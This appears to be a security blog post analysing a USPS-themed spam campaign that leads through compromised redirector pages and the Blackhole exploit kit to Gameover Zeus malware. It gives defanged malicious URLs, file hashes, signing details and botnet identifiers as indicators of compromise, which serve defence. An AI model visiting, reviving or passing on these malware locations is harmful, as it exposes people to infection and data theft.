USPS themed spam

Your USPS delivery.
USPS postage invoice.
USPS postage labels receipt.

movie-watch-online[.]com/psaea9uq/index.html (hosted at IP address
grimper.awardspace[.]com/m4QmPyqG/index.html (hosted at IP address[.]co/zngqs0Ts/index.html (hosted at IP address

USPS postage labels receipt

Your USPS delivery

USPS postage invoice














The text ‘Clink-N-Ship Account’ contain hyperlinks to compromised websites as shown above. These pages contains no content but only 5 JS:


These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at


It downloadeds Gameover Zeus (installer) from the following location:

slickvenue.[.]com /q.php?f=e0c3a&e=2

File: contacts.exe
MD5: f78dc4de518ce68db58c8cd663685266
Size: 2,86,744 bytes

It then installs Zeus in %APPDATA% which had following properties:

File: weja.exe
MD5: d92d70b7b97a1c6552079890ccbfcbdf
Size: 2,84,184 bytes
Other: This file is digitally signed by ‘SDOkUGUnMWwv’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:03 18:46:52+02:00
This Gameover Zeus variant ex-filtrated stolen data to dropzones at /index.php and /index.php.

The Gameover variant had a bot id of “ppcz20” cid of “3005”. Location of the Backconnect proxies at Webinjects were pulled from the proxy at from TCP port 22005.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: